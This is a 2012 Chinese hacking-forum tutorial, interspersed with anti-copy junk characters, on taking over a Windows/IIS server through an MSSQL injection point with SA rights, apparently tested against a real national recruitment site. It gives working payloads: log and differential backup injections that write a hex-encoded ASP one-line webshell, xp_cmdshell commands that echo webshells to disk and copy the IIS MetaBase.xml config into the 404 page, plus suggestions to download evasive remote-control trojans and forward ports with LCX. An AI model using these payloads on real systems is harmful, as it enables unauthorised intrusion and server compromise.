中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————  Y4 a$ E7 q8 u' \/ U
( m! W0 R* a& Y. Y! V5 S- F) V
$ {0 }4 Y( f- S  A; x2 x( h6 e
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。1 z- e, w* s% O& M" E* _2 W0 H

3 _$ ]9 c! y" s5 v, r                                                                 1 l3 c5 W. P) X+ N4 i
                                                                 
: f! n6 {4 K7 X                                                                  论坛: http://www.90team.net/* x8 Q. f' T7 u  T+ R: b8 a) R" w
# q  |0 B+ C+ g
8 x% G, f% t; b1 e

" L' V7 M$ L) ~4 l友情检测国家人才网
. h# h4 P* S3 D3 U; v; @5 A# K& x  x9 d& s
( m8 A+ c, j: C2 v) k
内容:MSSQL注入SA权限不显错模式下的入侵" t, S4 V) M  @0 w2 H7 M  \) o
5 `0 l' u/ k" a- O- I3 B, }5 Q" _
4 d- h! x) z, e' Y
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。8 A0 V+ ^% m6 x

( ?% ?5 `' L, y, I  s3 D  o5 m# G3 _+ k我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
+ E2 m! x' d: F$ e  H6 o2 |' M/ A% Z5 s" B4 O: Q9 L
" Y. E0 \+ f2 M, ~# ^6 ]
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。7 K- T6 H0 L& Q

. _; f/ O% n1 X# ~4 N9 i8 R) [  w思路:8 C! G. V/ _: O+ w1 f

. d" k: i# n& L4 d4 ~首先:% Z4 k: P" y) ^" A

* Q4 ?1 f+ l/ Y通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。$ m) ^6 G4 J- f, O) M+ f5 w( ~

+ ^2 R, L+ S* P4 @, G3 B* F+ ]1.日志备份获得Webshell8 k3 p) e$ u2 u4 `2 a+ V
; o- H3 }- i* H/ O' k6 c9 p% {9 ~
2.数据库差异备份获得Webshell
1 K8 A. c( p0 \* [  R3 s7 j' C- m, Q( P7 F% K
4.直接下载免杀远控木马。
- K3 v0 ]( i3 }. V0 M! R( Z3 G- E5 |
. o! f' h8 x% l; B. ^5.直接下载LCX将服务器端口转发出来1 Z. B1 y' O: z1 |! H, T2 t& B
( b+ N0 G, Y2 E: m4 f/ J' I! ^
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。% w' ]5 ]$ b2 `9 r: ~

5 `( D, H( ]) F$ H! `7 D7 Q
/ p! S# d0 i: v9 s5 N# O% s* O* {3 z- A% D' W
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, # W# T3 w# \7 f
+ h: P5 T3 I/ Q* p5 n3 `
我直接演示后面一个方法
( }- m9 S3 W. C: W& V( q
3 e7 U- n" m1 Q: h: v
% _1 o6 |  m& g1 @分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
* ?. r- Z8 u% O$ w( K+ x1 h! U* ^4 C  H0 ~- ?: g' U; k$ S( e

$ U8 N8 J+ x: N; M3 W% t* Z$ e7 Y; ~7 U% J9 X/ ]$ v

7 ?' V2 u, n1 Y5 m9 G◆日志备份:1 m! E2 o5 C% a5 U4 C
) e$ P( @6 b* q% s# K: j

9 Q: M6 k8 c. [1. 进行初始备份% o9 F5 v1 l9 D) k
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
+ Z2 ?0 `) k$ @' B! P" W1 y* c8 G
2. 插入数据8 Q& O+ b8 S- y. I& p, k1 c
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
8 {/ ~( ^% b1 c* X+ h* y: K3 t. A3 B2 X
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
0 h; K. Q" ]/ n' A  
' |/ `3 ?0 E/ v) }3. 备份并获得文件,删除临时表( g; h; T0 G+ `2 y7 }
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--  S! ]- g* y+ C, G# d
2 X; @7 h7 a, J& }& p
' K5 C8 e* X: x( E
7 f7 o9 `+ P5 |  B+ C
◆数据库差异备份
$ {# @  E( v5 c% `
- `4 l" ?' L# Q- }) @  w(1. 进行差异备份准备工作$ J% g% s9 w9 }, X

6 X7 ~6 \2 Z/ N, U" t: f: U9 p;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
, z) j8 V* K; r1 Y. H. _
9 f% D8 b/ D- ], p上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
3 i3 |) m3 v5 m5 W" l4 A+ k0 h
/ m6 u4 @; U  ^7 f* b
! l' A/ O. y  D0 x% A(2. 将数据写入到数据库5 i) u' p9 q5 o6 {9 I
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
: T% L' I1 f( x% ]7 Y5 {6 h- N& [+ o* d8 a3 P- k: n6 E4 R) q# ~
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>2 K7 M  A: Y1 r# ?2 Y$ G
. w. o" Y; j# Y4 o5 M
3. 备份数据库并清理临时文件8 ^6 Z( R6 q- {2 ~5 N" z
+ @- v" @8 n8 n1 w% V* O7 o( h6 E
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
, }7 ?/ W& A, ]0 T  C
- _! d  n  R- N3 q9 w4 `2 s* P0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 5 d. A" p9 j! |1 ~
) V+ M6 j2 b& a5 F4 u
. t' G- F8 ^7 X1 b2 j
0 h1 j5 P. L6 a3 [
用^转义字符来写ASP(一句话木马)文件的方法:   % M3 J0 ^' v( f, m" f
) g. J( ?9 W2 F& M3 n+ v7 w
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--5 \5 g0 C# }$ Q: `

: q* w: N& K) e2 Q1 g$ p2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp $ _8 m3 p: g; ^) E4 t" S

& A+ @2 q; ^. S8 D9 a; j! Z读取IIS配置信息获取web路径- |# X" ^/ y3 B1 P7 w
  b! ]. c, z& X$ m& U9 l% O+ q! o/ l
     8 M" p) V/ p6 p$ V5 j- k
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
+ A! o9 Q' f$ X1 f9 Y# A
. u/ [& f* n8 n8 ?9 S# k. [) @. @执行命令6 K$ P/ Z) e3 h, F' I7 o
     3 V. p3 y; w* `( L8 Q! L0 j  U3 t
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
# k4 u9 l/ O( l4 s+ q/ v: o2 P4 c) Z, C$ t$ ?
2 H- \" K- @, S  @

( b! f5 Q: C5 c0 c$ z. H
( P+ B; K, A( t& c8 f
# ~* w' C% _9 ], z' q' y: J- ~" r- ]) G: F. r
* W4 W3 @' B: ~7 m( I
$ k5 p6 f% S# l, Y; Q
+ ]# {" I5 T2 C9 x# f

4 k4 V$ z  _3 V( P4 e% d# x. c: O6 U5 @- `4 ^6 M5 w

6 C+ }1 w: _; Q' F% A1 f9 x% ?' J
+ g4 G# u1 [; x) o! a  |( n
. R  L) `" u  F# d; ^
1 p) G' g& x8 T7 F+ z" ]' j
: L. B& M4 _* ~1 ^6 n' n8 i2 |
! W; u  V) K" i8 k- ~. `$ s2 Z6 _; I

4 G* B( x) ]0 w  ^8 ~2 [
  r0 W& s$ H- k* ?( t* r/ C$ _* s& Q5 ^1 N
( Q: u, u% c' [4 y
5 I0 k0 E! a& z: ^. q1 z0 C

, `) T5 h: i* [0 E
$ G- y: L& c/ t0 T% t" A  @6 v" k& y2 N) W
& h- T- {5 X4 p( n2 ]' O* ]6 S
3 O3 P6 y% R4 Y1 h4 E+ w6 @
7 K7 R8 ~& G5 P: q% S* N
3 F0 q4 K% r. n. j. P& a, }) U
2 a2 p: g, Q/ U' L3 n7 v3 i4 ^: a
' f- |" U+ t/ j* g- K

3 ]$ X1 D  B" d: l! u1 m$ i, F( @4 B1 Q5 q) O
- K$ G# T' N  N" e! Y2 d0 W2 k6 E1 b
( y8 t2 ^7 M6 H$ {
# {% ^# G  u* Z: F  D' x  g) t
" [0 A. H2 m  d
  M2 N; Q* Z4 u6 z" f# Y/ u& R
% @, l  ]! l' A2 V2 f# f- h' k' ?  C
# L7 R5 L1 _: i/ i0 N! n2 \2 J
4 A0 y0 w0 N& x8 c% ^
- S0 W% `" F: t/ ^: T+ |+ {0 e
! M9 p$ C2 F4 c- L* E! s0 P+ b/ `

. F& N4 k  j1 q% S9 r) T+ }8 M- m6 G0 i: v; _4 V

4 N" q( F( L$ Q6 {/ n
% h, ]4 u6 @5 [- i- t



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2